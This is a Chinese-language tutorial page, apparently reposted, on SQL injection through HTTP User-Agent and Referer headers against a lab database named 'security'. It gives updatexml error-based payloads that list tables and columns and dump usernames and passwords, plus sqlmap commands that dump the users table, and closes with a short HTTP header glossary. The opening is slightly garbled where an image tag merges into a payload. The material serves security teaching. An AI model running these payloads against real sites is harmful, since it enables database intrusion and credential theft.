图文详解HTTP头中的SQL注入

技术教程 2026-01-08 18:26:22 浏览
" and updatexml(1,concat(0x7e,(select图文详解HTTP头中的SQL注入" alt="图文HTTP头SQL注入" src="/uploads/img/202305/3b48e839947140bc29385b618a125327.jpg">

3.得到数据库,获取数据表

" and updatexml(1,concat(0x7e,(select group_concat(table_name) FROM information_schema.tables where table_schema="security"),0x7e),1) or "1"="1

4.得到数据表emails,referers,uagents,users,我们使用的是表,获取字段名

" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security"and table_name="users"),0x7e),1) or "1"="1

5.获取字段内容

当我们使用下面的语句时,会报错Subquery returns more than 1 row

" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users),0x7e),1) or "1"="1

返回的数据有多行,我们可以使用限制其只返回一条数据

" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1) or "1"="1

4.sqlmap安全测试

抓取数据包,将抓取的全部内容,放到文本文档中,并且在有可能存在注入点的地方加入星号(*)

1.爆破数据库

python2 sqlmap.py -r 1.txt --dbs

得到数据库信息

2.爆破数据表

python2 sqlmap.py -r 1.txt -D security --tables

得到数据表的信息

3.爆破字段及内容

python2 sqlmap.py -r 1.txt -D security -T users --dump

得到数据内容

1.HTTP User-Agent注入HTTP Referer注入属于放包攻击,我们在放包的过程中,必须使用正确的用户名和密码;

2.如果探测出是头注入,在使用跑的过程中,在末尾加上星号(),可以提高渗透测试的效率

5.HTTP头部详解

User-Agent:使得服务器能够识别客户使用的操作系统,游览器版本等.(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中)

Cookie:网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密).

X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])

Clien-IP:同上,不做过多介绍.

Rerferer:浏览器向 WEB 服务器表明自己是从哪个页面链接过来的.

HTTP

Host:客户端指定自己想访问的WEB服务器的域名/IP 地址和端口号(这个我本人还没碰到过,不过有真实存在的案例还是写上吧).

总结

原文链接:

本文版权声明本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,请联系本站客服,一经查实,本站将立刻删除。

发表评论

热门推荐